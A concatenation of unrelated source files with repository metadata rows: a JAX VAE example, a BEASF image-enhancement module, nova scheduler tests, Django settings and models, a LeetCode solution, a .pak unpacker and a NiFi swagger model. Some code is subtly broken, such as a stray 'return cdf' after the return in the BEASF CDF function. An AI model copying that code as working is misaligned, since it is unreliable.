  _, dec_params = params
  code_rng, img_rng = random.split(rng)
  codes = random.normal(code_rng, (nrow * ncol, 10))
  logits = decode(dec_params, codes)
  # NOTE(review): logaddexp(0., logits) is softplus, not a sigmoid
  # probability; preserved exactly as in the original — confirm intent.
  sampled_images = random.bernoulli(img_rng, jnp.logaddexp(0., logits))
  return image_grid(nrow, ncol, sampled_images, (28, 28))
def image_grid(nrow, ncol, imagevecs, imshape):
  """Reshape a stack of flattened images into a single grid for plotting."""
  tiles = iter(imagevecs.reshape((-1,) + imshape))
  rows = []
  for _ in range(nrow):
    row = [next(tiles).T for _ in range(ncol)]
    rows.append(jnp.hstack(row[::-1]))
  return jnp.vstack(rows).T
# Encoder: 784 -> 512 -> 512, then fan out to the latent posterior's mean and
# softplus-positive variance (10-dimensional latent code).
encoder_init, encode = stax.serial(
    Dense(512), Relu,
    Dense(512), Relu,
    FanOut(2),
    stax.parallel(Dense(10), stax.serial(Dense(10), Softplus)),
)
# Decoder: 10-dim latent code -> 512 -> 512 -> 28*28 Bernoulli logits.
decoder_init, decode = stax.serial(
    Dense(512), Relu,
    Dense(512), Relu,
    Dense(28 * 28),
)
if __name__ == "__main__":
  # Training hyperparameters.
  step_size = 0.001
  num_epochs = 100
  batch_size = 32
  nrow, ncol = 10, 10  # sampled image grid size
  test_rng = random.PRNGKey(1)  # fixed prng key for evaluation
  imfile = os.path.join(os.getenv("TMPDIR", "/tmp/"), "mnist_vae_{:03d}.png")
  train_images, _, test_images, _ = datasets.mnist(permute_train=True)
  num_complete_batches, leftover = divmod(train_images.shape[0], batch_size)
  num_batches = num_complete_batches + bool(leftover)
  # Initialize encoder/decoder parameters from fixed seeds.
  enc_init_rng, dec_init_rng = random.split(random.PRNGKey(2))
  _, init_encoder_params = encoder_init(enc_init_rng, (batch_size, 28 * 28))
  _, init_decoder_params = decoder_init(dec_init_rng, (batch_size, 10))
  init_params = init_encoder_params, init_decoder_params
  opt_init, opt_update, get_params = optimizers.momentum(step_size, mass=0.9)
  # Move both datasets onto the accelerator once, up front.
  train_images = jax.device_put(train_images)
  test_images = jax.device_put(test_images)
  def binarize_batch(rng, i, images):
    # Slice out batch i (cyclically) and sample a fresh binarization of it.
    i = i % num_batches
    batch = lax.dynamic_slice_in_dim(images, i * batch_size, batch_size)
    return random.bernoulli(rng, batch)
  @jit
  def run_epoch(rng, opt_state, images):
    # One full optimization pass over all batches, jit-compiled end to end.
    def body_fun(i, opt_state):
      elbo_rng, data_rng = random.split(random.fold_in(rng, i))
      batch = binarize_batch(data_rng, i, images)
      loss = lambda params: -elbo(elbo_rng, params, batch) / batch_size
      g = grad(loss)(get_params(opt_state))
      return opt_update(i, g, opt_state)
    return lax.fori_loop(0, num_batches, body_fun, opt_state)
  @jit
  def evaluate(opt_state, images):
    # Per-example test ELBO plus a fresh sample grid; the fixed test_rng
    # makes evaluation reproducible across epochs.
    params = get_params(opt_state)
    elbo_rng, data_rng, image_rng = random.split(test_rng, 3)
    binarized_test = random.bernoulli(data_rng, images)
    test_elbo = elbo(elbo_rng, params, binarized_test) / images.shape[0]
    sampled_images = image_sample(image_rng, params, nrow, ncol)
    return test_elbo, sampled_images
  opt_state = opt_init(init_params)
  for epoch in range(num_epochs):
    tic = time.time()
    opt_state = run_epoch(random.PRNGKey(epoch), opt_state, train_images)
    test_elbo, sampled_images = evaluate(opt_state, test_images)
    print("{: 3d} {} ({:.3f} sec)".format(epoch, test_elbo, time.time() - tic))
    plt.imsave(imfile.format(epoch), sampled_images, cmap=plt.cm.gray)
| 36.471014 | 80 | 0.722631 |
795bc4ddc7ac0278618fdb4f39277b43deff2941 | 3,181 | py | Python | BEASF.py | haddomou/COVID-CXNet | d7546401b38a2d2ca70ee98aa7ebd9e23c3aa05c | [
"MIT"
] | 2 | 2020-09-07T06:03:11.000Z | 2022-02-22T22:17:23.000Z | BEASF.py | ShubhamAggarwal2000/COVID-CXNet | 1baa9f7b8f4af86aab42dd05e44a3357813662d6 | [
"MIT"
] | null | null | null | BEASF.py | ShubhamAggarwal2000/COVID-CXNet | 1baa9f7b8f4af86aab42dd05e44a3357813662d6 | [
"MIT"
] | null | null | null | import numpy as np
import copy
def subhist(image_pdf, minimum, maximum, normalize):
    """
    Extract the sub-histogram of image_pdf on [minimum, maximum] (inclusive).
    Bins outside the range are zeroed; when normalize is true the kept bins
    are divided by their total mass so they sum to 1.
    :param image_pdf: numpy.array (1-D normalized histogram / PDF)
    :param minimum: int
    :param maximum: int
    :param normalize: boolean
    :return: numpy.array (same shape as image_pdf)
    """
    hi = np.zeros(shape=image_pdf.shape)
    # Vectorized slice copy replaces the original per-bin Python loop.
    hi[minimum:maximum + 1] = image_pdf[minimum:maximum + 1]
    if normalize:
        # Same division as the original per-bin loop; a zero total would
        # divide by zero there too, so no extra guard is added here.
        hi[minimum:maximum + 1] /= hi[minimum:maximum + 1].sum()
    return hi
def CDF(hist):
    """
    Compute the CDF (running sum) of the input histogram.
    :param hist: numpy.array()
    :return: numpy.array() of float64, where cdf[i] = hist[0] + ... + hist[i]
    """
    # np.cumsum performs the running total in one C-level pass, replacing
    # the original element-by-element Python loop.  dtype=float64 matches
    # the original np.zeros accumulator.
    return np.cumsum(hist, dtype=np.float64)
return cdf
def BEASF(image, gamma):
    """
    Compute the Bi-Histogram Equalization with Adaptive Sigmoid Functions algorithm (BEASF)
    A python implementation of the original MATLAB code:
    https://mathworks.com/matlabcentral/fileexchange/47517-beasf-image-enhancer-for-gray-scale-images
    The algorithm is introduced by E. F. Arriaga-Garcia et al., in the research paper:
    https://ieeexplore.ieee.org/document/6808563
    :param image: numpy.ndarray (assumes an 8-bit grayscale image, values 0..255)
    :param gamma: float [0, 1]
    :return: numpy.ndarray
    """
    # Split the 256-bin histogram at the image mean m into two normalized halves.
    m = int(np.mean(image, dtype=np.int32))
    h = np.histogram(image, bins=256)[0] / (image.shape[0] * image.shape[1])
    h_lower = subhist(image_pdf=h, minimum=0, maximum=m, normalize=True)
    h_upper = subhist(image_pdf=h, minimum=m, maximum=255, normalize=True)
    cdf_lower = CDF(hist=h_lower)
    cdf_upper = CDF(hist=h_upper)
    # Find x | CDF(x) = 0.5
    half_low = 0
    for idx in range(0, m+2):
        if cdf_lower[idx] > 0.5:
            half_low = idx
            break
    half_up = 0
    for idx in range(m, 256):
        if cdf_upper[idx + 1] > 0.5:
            half_up = idx
            break
    # sigmoid CDF creation
    tones_low = np.arange(0, m+1, 1)
    x_low = 5.0 * (tones_low - half_low) / m  # shift & scale intensity x to place sigmoid [-2.5, 2.5]
    s_low = 1 / (1 + np.exp(-gamma * x_low))  # lower sigmoid
    tones_up = np.arange(m, 256, 1)
    x_up = 5.0 * (tones_up - half_up) / (255 - m)  # shift & scale intensity x to place sigmoid [-2.5, 2.5]
    s_up = 1 / (1 + np.exp(-gamma * x_up))  # upper sigmoid
    # Build the intensity mapping from the two sigmoids, then min-max rescale
    # each half back onto its own output range ([0, m] and (m, 255]).
    mapping_vector = np.zeros(shape=(256,))
    for idx in range(0, m+1):
        mapping_vector[idx] = np.int32(m * s_low[idx])
    minimum = mapping_vector[0]
    maximum = mapping_vector[m]
    for idx in range(0, m+1):
        mapping_vector[idx] = np.int32((m / (maximum - minimum)) * (mapping_vector[idx] - minimum))
    for idx in range(m+1, 256):
        mapping_vector[idx] = np.int32(m + (255 - m) * s_up[idx - m - 1])
    minimum = mapping_vector[m + 1]
    maximum = mapping_vector[255]
    for idx in range(m+1, 256):
        mapping_vector[idx] = (255 - m) * (mapping_vector[idx] - minimum) / (maximum - minimum) + m
    # Apply the lookup table per pixel; image values index mapping_vector,
    # so this presumes integer pixel values in 0..255 — confirm at call site.
    res = copy.deepcopy(image)
    res[:, :] = mapping_vector[image[:, :]]
    return res
| 32.793814 | 107 | 0.614587 |
795bc519da533731fcf545dfb06e3539e5078b90 | 6,416 | py | Python | nova/tests/unit/scheduler/weights/test_weights_affinity.py | lixiaoy1/nova | 357b8b38e88300948bb2e07d1bbaabd1e9d7b60e | [
"Apache-2.0"
] | 1 | 2018-08-19T02:13:16.000Z | 2018-08-19T02:13:16.000Z | nova/tests/unit/scheduler/weights/test_weights_affinity.py | lixiaoy1/nova | 357b8b38e88300948bb2e07d1bbaabd1e9d7b60e | [
"Apache-2.0"
] | 2 | 2021-03-31T19:25:14.000Z | 2021-12-13T20:15:06.000Z | nova/tests/unit/scheduler/weights/test_weights_affinity.py | lixiaoy1/nova | 357b8b38e88300948bb2e07d1bbaabd1e9d7b60e | [
"Apache-2.0"
] | 1 | 2020-07-22T22:15:29.000Z | 2020-07-22T22:15:29.000Z | # Copyright (c) 2015 Ericsson AB
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova import objects
from nova.scheduler import weights
from nova.scheduler.weights import affinity
from nova import test
from nova.tests.unit.scheduler import fakes
class SoftWeigherTestBase(test.NoDBTestCase):
    """Shared fixture and helpers for the soft (anti-)affinity weigher tests."""
    def setUp(self):
        super(SoftWeigherTestBase, self).setUp()
        self.weight_handler = weights.HostWeightHandler()
        self.weighers = []
    def _get_weighed_host(self, hosts, policy):
        # Weigh ``hosts`` for a 7-member server group under ``policy`` and
        # return the highest-weighted host.
        request_spec = objects.RequestSpec(
            instance_group=objects.InstanceGroup(
                policy=policy,
                members=['member1',
                         'member2',
                         'member3',
                         'member4',
                         'member5',
                         'member6',
                         'member7']))
        return self.weight_handler.get_weighed_objects(self.weighers,
                                                       hosts,
                                                       request_spec)[0]
    def _get_all_hosts(self):
        # Four fake hosts carrying 1, 4, 0 and 2 group members respectively.
        host_values = [
            ('host1', 'node1', {'instances': {
                'member1': mock.sentinel,
                'instance13': mock.sentinel
            }}),
            ('host2', 'node2', {'instances': {
                'member2': mock.sentinel,
                'member3': mock.sentinel,
                'member4': mock.sentinel,
                'member5': mock.sentinel,
                'instance14': mock.sentinel
            }}),
            ('host3', 'node3', {'instances': {
                'instance15': mock.sentinel
            }}),
            ('host4', 'node4', {'instances': {
                'member6': mock.sentinel,
                'member7': mock.sentinel,
                'instance16': mock.sentinel
            }})]
        return [fakes.FakeHostState(host, node, values)
                for host, node, values in host_values]
    def _do_test(self, policy, expected_weight,
                 expected_host):
        # Run the configured weighers and assert the winner's weight (and
        # host, when expected_host is not None).
        hostinfo_list = self._get_all_hosts()
        weighed_host = self._get_weighed_host(hostinfo_list,
                                              policy)
        self.assertEqual(expected_weight, weighed_host.weight)
        if expected_host:
            self.assertEqual(expected_host, weighed_host.obj.host)
class SoftAffinityWeigherTestCase(SoftWeigherTestBase):
    """soft-affinity: the host holding the most group members should win."""
    def setUp(self):
        super(SoftAffinityWeigherTestCase, self).setUp()
        self.weighers = [affinity.ServerGroupSoftAffinityWeigher()]
    def test_soft_affinity_weight_multiplier_by_default(self):
        self._do_test(policy='soft-affinity',
                      expected_weight=1.0,
                      expected_host='host2')
    def test_soft_affinity_weight_multiplier_zero_value(self):
        # We do not know the host, all have same weight.
        self.flags(soft_affinity_weight_multiplier=0.0,
                   group='filter_scheduler')
        self._do_test(policy='soft-affinity',
                      expected_weight=0.0,
                      expected_host=None)
    def test_soft_affinity_weight_multiplier_positive_value(self):
        self.flags(soft_affinity_weight_multiplier=2.0,
                   group='filter_scheduler')
        self._do_test(policy='soft-affinity',
                      expected_weight=2.0,
                      expected_host='host2')
    @mock.patch.object(affinity, 'LOG')
    def test_soft_affinity_weight_multiplier_negative_value(self, mock_log):
        # A negative multiplier inverts the preference (fewest members wins).
        self.flags(soft_affinity_weight_multiplier=-1.0,
                   group='filter_scheduler')
        self._do_test(policy='soft-affinity',
                      expected_weight=0.0,
                      expected_host='host3')
        # call twice and assert that only one warning is emitted
        self._do_test(policy='soft-affinity',
                      expected_weight=0.0,
                      expected_host='host3')
        self.assertEqual(1, mock_log.warning.call_count)
class SoftAntiAffinityWeigherTestCase(SoftWeigherTestBase):
    """soft-anti-affinity: the host holding the fewest group members should win."""
    def setUp(self):
        super(SoftAntiAffinityWeigherTestCase, self).setUp()
        self.weighers = [affinity.ServerGroupSoftAntiAffinityWeigher()]
    def test_soft_anti_affinity_weight_multiplier_by_default(self):
        self._do_test(policy='soft-anti-affinity',
                      expected_weight=1.0,
                      expected_host='host3')
    def test_soft_anti_affinity_weight_multiplier_zero_value(self):
        # We do not know the host, all have same weight.
        self.flags(soft_anti_affinity_weight_multiplier=0.0,
                   group='filter_scheduler')
        self._do_test(policy='soft-anti-affinity',
                      expected_weight=0.0,
                      expected_host=None)
    def test_soft_anti_affinity_weight_multiplier_positive_value(self):
        self.flags(soft_anti_affinity_weight_multiplier=2.0,
                   group='filter_scheduler')
        self._do_test(policy='soft-anti-affinity',
                      expected_weight=2.0,
                      expected_host='host3')
    @mock.patch.object(affinity, 'LOG')
    def test_soft_anti_affinity_weight_multiplier_negative_value(self,
                                                                 mock_log):
        # A negative multiplier inverts the preference (most members wins).
        self.flags(soft_anti_affinity_weight_multiplier=-1.0,
                   group='filter_scheduler')
        self._do_test(policy='soft-anti-affinity',
                      expected_weight=0.0,
                      expected_host='host2')
        # call twice and assert that only one warning is emitted
        self._do_test(policy='soft-anti-affinity',
                      expected_weight=0.0,
                      expected_host='host2')
        self.assertEqual(1, mock_log.warning.call_count)
| 40.1 | 78 | 0.590399 |
795bc59e192525653ef717c01e654b89793e1b03 | 4,253 | py | Python | shortener/shortener/settings/production.py | siauPatrick/shortener_project | 2438e28a2bab7c37aff2f06185b14ede93422567 | [
"MIT"
] | null | null | null | shortener/shortener/settings/production.py | siauPatrick/shortener_project | 2438e28a2bab7c37aff2f06185b14ede93422567 | [
"MIT"
] | null | null | null | shortener/shortener/settings/production.py | siauPatrick/shortener_project | 2438e28a2bab7c37aff2f06185b14ede93422567 | [
"MIT"
] | null | null | null | """Production settings and globals."""
from os import environ
import dj_database_url
from S3 import CallingFormat
from base import *
# Normally you should not import ANYTHING from Django directly
# into your settings, but ImproperlyConfigured is an exception.
from django.core.exceptions import ImproperlyConfigured
def get_env_setting(setting):
    """Return the value of environment variable ``setting``.

    Raises ImproperlyConfigured (rather than KeyError) when the variable is
    unset, so missing deployment configuration fails loudly at import time.
    """
    try:
        return environ[setting]
    except KeyError:
        raise ImproperlyConfigured("Set the %s env variable" % setting)
INSTALLED_APPS += ('gunicorn',)
########## EMAIL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host
EMAIL_HOST = environ.get('EMAIL_HOST', 'smtp.gmail.com')
# NOTE(review): this fallback only fires when EMAIL_HOST is set to an empty
# string, because the .get() above already defaults to a non-empty value.
if not EMAIL_HOST:
    EMAIL_HOST = environ.get('EMAIL_HOST', 'smtp.sendgrid.com')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-password
EMAIL_HOST_PASSWORD = environ.get('EMAIL_HOST_PASSWORD', '')
if not EMAIL_HOST_PASSWORD:
    EMAIL_HOST_PASSWORD = environ.get('SENDGRID_PASSWORD', '')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-user
EMAIL_HOST_USER = environ.get('EMAIL_HOST_USER', '')
if not EMAIL_HOST_USER:
    EMAIL_HOST_USER = environ.get('SENDGRID_USERNAME', '')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-port
EMAIL_PORT = environ.get('EMAIL_PORT', 587)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = '[%s] ' % SITE_NAME
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-use-tls
EMAIL_USE_TLS = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = EMAIL_HOST_USER
########## END EMAIL CONFIGURATION
########## DATABASE CONFIGURATION
# Database settings are parsed from the DATABASE_URL environment variable.
DATABASES = {'default': dj_database_url.config()}
########## END DATABASE CONFIGURATION
########## CACHE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#caches
# CACHES = {}
########## END CACHE CONFIGURATION
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Deployment fails fast (ImproperlyConfigured) if SECRET_KEY is not set.
SECRET_KEY = get_env_setting('SECRET_KEY')
########## END SECRET CONFIGURATION
########## STORAGE
# Static and media files are served from an S3 bucket via django-storages.
INSTALLED_APPS += ('storages',)
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
STATICFILES_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
AWS_ACCESS_KEY_ID = get_env_setting('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = get_env_setting('AWS_SECRET_ACCESS_KEY')
AWS_STORAGE_BUCKET_NAME = "shortener"
AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
# Far-future Expires plus one-day Cache-Control on all uploaded objects.
AWS_HEADERS = {
    'Expires': 'Thu, 15 Apr 2020 20:00:00 GMT',
    'Cache-Control': 'max-age=86400',
}
# Objects are served without signed querystrings (public URLs).
AWS_QUERYSTRING_AUTH = False
STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
MEDIA_URL = STATIC_URL
########## END STORAGE
########### LOGGING
# Emails site admin when 500 is triggered
LOGGING = {
    'version': 1,
    'disable_existing_loggers': True,
    'formatters': {
        'standard': {
            'format': "[%(asctime)s] %(levelname)s [%(name)s.%(funcName)s:%(lineno)d] %(message)s",
            'datefmt': "%d/%b/%Y %H:%M:%S"
        },
    },
    'handlers': {
        # Colorized console output at DEBUG and above.
        'console': {
            'level': 'DEBUG',
            'class': 'logutils.colorize.ColorizingStreamHandler',
            'formatter': 'standard'
        },
        # HTML error emails to ADMINS on ERROR and above.
        'mail_admins': {
            'level': 'ERROR',
            'class': 'django.utils.log.AdminEmailHandler',
            'include_html': True,
        },
    },
    'loggers': {
        'django': {
            'handlers': ['console', ],
            'propagate': True,
            'level': 'ERROR',
        },
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': False,
        },
        # Root logger: console only; verbosity controlled by DEBUG_LEVEL env var.
        '': {
            'handlers': ['console', ],
            'level': environ.get('DEBUG_LEVEL', 'ERROR'),
        },
    }
}
########### END LOGGING
########### HOSTS
ALLOWED_HOSTS = ['2scoops.co', 'twoscoops-co.herokuapp.com', 'www.2scoops.co', ]
########### END HOSTS
795bc7aa0fd4c54c49f180ea4c33eadf38155117 | 478 | py | Python | 35-search-insert-position/35-search-insert-position.py | kayanmorshed/Leetcode | 233e50a069a69fbe126dc86d293d4024eb070b8a | [
"MIT"
] | null | null | null | 35-search-insert-position/35-search-insert-position.py | kayanmorshed/Leetcode | 233e50a069a69fbe126dc86d293d4024eb070b8a | [
"MIT"
] | null | null | null | 35-search-insert-position/35-search-insert-position.py | kayanmorshed/Leetcode | 233e50a069a69fbe126dc86d293d4024eb070b8a | [
"MIT"
] | null | null | null | class Solution:
def searchInsert(self, nums: List[int], target: int) -> int:
left, right = -1, len(nums)
while left < right:
mid = (left + right) // 2
if mid < 0: return 0
if nums[mid] == target:
return mid
elif nums[mid] < target:
left = mid + 1
else:
right = mid
return right
| 23.9 | 66 | 0.384937 |
795bc7e2d4bd3fbacc5ad11facc1a8e1abd634e1 | 3,125 | py | Python | backend/task/models.py | crowdbotics-apps/mosistant-28436 | 010ae78f47bdd5490d69bf36e896590d158d2988 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/task/models.py | crowdbotics-apps/mosistant-28436 | 010ae78f47bdd5490d69bf36e896590d158d2988 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/task/models.py | crowdbotics-apps/mosistant-28436 | 010ae78f47bdd5490d69bf36e896590d158d2988 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | from django.conf import settings
from django.db import models
class Message(models.Model):
    """A chat message between a customer and a tasker, optionally linked
    to a specific task. (Crowdbotics auto-generated model.)"""
    # Deleting either profile deletes their messages (CASCADE).
    customer = models.ForeignKey(
        "task_profile.CustomerProfile",
        on_delete=models.CASCADE,
        related_name="message_customer",
    )
    tasker = models.ForeignKey(
        "task_profile.TaskerProfile",
        on_delete=models.CASCADE,
        related_name="message_tasker",
    )
    # Free-form message body.
    message = models.TextField()
    # Set once on insert.
    timestamp_created = models.DateTimeField(
        auto_now_add=True,
    )
    # Optional link to the task being discussed; kept (nulled) if the task goes away.
    task = models.ForeignKey(
        "task.Task",
        null=True,
        blank=True,
        on_delete=models.SET_NULL,
        related_name="message_task",
    )
class Rating(models.Model):
    """A customer's rating (and optional text review) of a tasker.
    (Crowdbotics auto-generated model.)"""
    # Ratings disappear with the tasker profile (CASCADE).
    tasker = models.ForeignKey(
        "task_profile.TaskerProfile",
        on_delete=models.CASCADE,
        related_name="rating_tasker",
    )
    # Numeric score; no range constraint is enforced at the model level.
    rating = models.FloatField()
    timestamp_created = models.DateTimeField(
        auto_now_add=True,
    )
    review = models.TextField(
        null=True,
        blank=True,
    )
    # Author of the rating; preserved (nulled) if the customer profile is deleted.
    customer = models.ForeignKey(
        "task_profile.CustomerProfile",
        null=True,
        blank=True,
        on_delete=models.SET_NULL,
        related_name="rating_customer",
    )
class Task(models.Model):
    """A job a customer books with a tasker, categorized and geolocated.
    (Crowdbotics auto-generated model.)"""
    customer = models.ForeignKey(
        "task_profile.CustomerProfile",
        on_delete=models.CASCADE,
        related_name="task_customer",
    )
    tasker = models.ForeignKey(
        "task_profile.TaskerProfile",
        on_delete=models.CASCADE,
        related_name="task_tasker",
    )
    category = models.ForeignKey(
        "task_category.Category",
        on_delete=models.CASCADE,
        related_name="task_category",
    )
    # Free-form description of the work.
    details = models.TextField()
    # Short coded strings; presumably enumerated values are enforced in the
    # application layer — no `choices` declared here (TODO confirm).
    frequency = models.CharField(
        max_length=7,
    )
    size = models.CharField(
        max_length=6,
    )
    # Exactly one location per task.
    location = models.OneToOneField(
        "location.TaskLocation",
        on_delete=models.CASCADE,
        related_name="task_location",
    )
    is_confirmed = models.BooleanField()
    status = models.CharField(
        max_length=10,
    )
    timestamp_created = models.DateTimeField(
        auto_now_add=True,
    )
    # Set when the task is confirmed; empty until then.
    timestamp_confirmed = models.DateTimeField(
        null=True,
        blank=True,
    )
    subcategory = models.ForeignKey(
        "task_category.Subcategory",
        null=True,
        blank=True,
        on_delete=models.CASCADE,
        related_name="task_subcategory",
    )
class TaskTransaction(models.Model):
    """Execution record for a task: its lifecycle status plus start/finish
    timestamps. (Crowdbotics auto-generated model.)"""
    # Short coded lifecycle state; values presumably enforced by the
    # application layer — no `choices` declared (TODO confirm).
    status = models.CharField(
        max_length=10,
    )
    timestamp_completed = models.DateTimeField(
        null=True,
        blank=True,
    )
    # A task may have multiple transactions; they vanish with the task (CASCADE).
    task = models.ForeignKey(
        "task.Task",
        null=True,
        blank=True,
        on_delete=models.CASCADE,
        related_name="tasktransaction_task",
    )
    # Scheduled date of the work, if known.
    date = models.DateField(
        null=True,
        blank=True,
    )
    timestamp_started = models.DateTimeField(
        null=True,
        blank=True,
    )
# Create your models here.
| 24.038462 | 47 | 0.61984 |
795bc8141031b2985a2ac02f741a1fa3b0cc92e2 | 158 | py | Python | login/admin.py | yueminghai/login-register | 90f103901cb85d1dd783fc05844269d448a1caa8 | [
"Apache-2.0"
] | null | null | null | login/admin.py | yueminghai/login-register | 90f103901cb85d1dd783fc05844269d448a1caa8 | [
"Apache-2.0"
] | null | null | null | login/admin.py | yueminghai/login-register | 90f103901cb85d1dd783fc05844269d448a1caa8 | [
"Apache-2.0"
] | null | null | null | from django.contrib import admin
# Admin registrations for the login app.
from . import models  # app-local models module (defines User and ConfirmString)
admin.site.register(models.User)  # expose the custom User model in the Django admin
admin.site.register(models.ConfirmString) | 26.333333 | 41 | 0.816456 |
795bc8bc177d4643fa0792f54b27550dee0fe953 | 1,706 | py | Python | v4/ResUnpack.py | qwerty472123/pakUnpacker | b1ed337375d899f656fd2705961dc39a1c43f451 | [
"MIT"
] | 30 | 2018-05-15T02:35:39.000Z | 2022-03-21T09:24:45.000Z | v4/ResUnpack.py | qwerty472123/pakUnpacker | b1ed337375d899f656fd2705961dc39a1c43f451 | [
"MIT"
] | 1 | 2019-02-20T18:41:35.000Z | 2019-02-20T18:41:35.000Z | v4/ResUnpack.py | qwerty472123/pakUnpacker | b1ed337375d899f656fd2705961dc39a1c43f451 | [
"MIT"
] | 16 | 2018-06-11T08:05:32.000Z | 2021-03-04T02:15:51.000Z | import collections
import struct
import sys
import os
def _guess_filetype(blob):
    """Best-effort sniff of a resource's file extension from its bytes.

    Mirrors the original detection order exactly: magic-number checks
    first (only for blobs longer than 6 bytes), then a keyword scan that
    promotes still-unidentified blobs to 'css', and css-looking blobs
    that also contain 'function' to 'js'.
    """
    filetype = 'bin'
    if len(blob) > 6:
        header = blob[:4]
        if header == b'\x89PNG':
            filetype = 'png'
        elif header == b'"use':
            filetype = 'js'
        elif header == b'RIFF':
            filetype = 'avi'
        elif header == b'(fun':
            filetype = 'js'
        elif header in (b'<htm', b'<!DO', b'<!do'):
            filetype = 'htm'
        elif blob[:2] == b'\x1f\x8b':
            filetype = 'gz'  # gzip magic
    if filetype == 'bin' and any(
            marker in blob for marker in (
                b'padding:', b'-webkit', b'margin:', b'width',
                b'styles', b'display', b'!important')):
        filetype = 'css'
        if b'function' in blob:
            filetype = 'js'
    return filetype


def UnpackDataPack(input_file):
    """Extract every resource from a version-4 .pak data file.

    Layout: a 9-byte "<IIB" header (version, num_entries, encoding),
    then index entries of "<HI" (resource id, absolute offset); each
    resource's extent runs to the next entry's offset, so the index is
    expected to carry a terminator entry after the last resource.
    Resources are written into the existing 'Unpack' directory as
    '<id>.<guessed extension>'.

    Fixes over the original: the input handle is closed (was leaked);
    the output path uses os.path.join instead of the literal
    'Unpack\\{0}.{1}', whose backslash is an invalid string escape and
    not a path separator on POSIX; the version error is a single
    formatted message instead of two Exception args printed as a tuple.

    Raises:
        Exception: if the header version is not 4.
    """
    with open(input_file, 'rb') as pak:
        original_data = pak.read()
    version, num_entries, encoding = struct.unpack("<IIB", original_data[:9])
    if version != 4:
        raise Exception("Wrong file version in {0}".format(input_file))
    index = original_data[9:]
    for _ in range(num_entries):
        resource_id, offset = struct.unpack("<HI", index[:6])
        index = index[6:]
        # Peek (without consuming) the next entry to find this resource's end.
        _next_id, next_offset = struct.unpack("<HI", index[:6])
        blob = original_data[offset:next_offset]
        out_path = os.path.join(
            'Unpack', '{0}.{1}'.format(resource_id, _guess_filetype(blob)))
        with open(out_path, 'wb') as out:
            out.write(blob)
def main():
    """CLI entry point: unpack the .pak file named by the first argument.

    Matches the original behavior: silently does nothing when no argument
    is given, and chdirs to the script's directory first so the relative
    'Unpack' output directory resolves next to the script.
    """
    if len(sys.argv) <= 1:
        return
    os.chdir(sys.path[0])
    UnpackDataPack(sys.argv[1])
if __name__ == '__main__':
main() | 34.816327 | 240 | 0.582063 |
795bc8c8f25b06722287b5937acef958391568b6 | 3,311 | py | Python | nipyapi/nifi/models/flow_entity.py | jyoti-arora1991/nipyapi | ad0b2bdfd0e65049df7cb45042402201ec924e1e | [
"Apache-2.0"
] | null | null | null | nipyapi/nifi/models/flow_entity.py | jyoti-arora1991/nipyapi | ad0b2bdfd0e65049df7cb45042402201ec924e1e | [
"Apache-2.0"
] | null | null | null | nipyapi/nifi/models/flow_entity.py | jyoti-arora1991/nipyapi | ad0b2bdfd0e65049df7cb45042402201ec924e1e | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.8.0
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class FlowEntity(object):
    """Swagger-generated model wrapping a single `flow` attribute.

    NOTE: This class was produced by the swagger code generator program;
    the wire contract (attribute names, serialization) is unchanged.
    """

    # attribute name -> declared swagger type
    swagger_types = {
        'flow': 'FlowDTO'
    }

    # attribute name -> JSON key in the API definition
    attribute_map = {
        'flow': 'flow'
    }

    def __init__(self, flow=None):
        """Create a FlowEntity, optionally seeding the `flow` attribute."""
        self._flow = None
        if flow is not None:
            self.flow = flow

    @property
    def flow(self):
        """The wrapped FlowDTO (may be None)."""
        return self._flow

    @flow.setter
    def flow(self, flow):
        """Set the wrapped FlowDTO."""
        self._flow = flow

    def to_dict(self):
        """Return the model's properties as a plain dict."""
        def serialize(value):
            # Nested swagger models expose to_dict(); everything else passes through.
            return value.to_dict() if hasattr(value, "to_dict") else value

        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [serialize(item) for item in value]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {k: serialize(v) for k, v in value.items()}
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Return the string representation of the model."""
        return pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """True when `other` is a FlowEntity with equal state."""
        return isinstance(other, FlowEntity) and self.__dict__ == other.__dict__

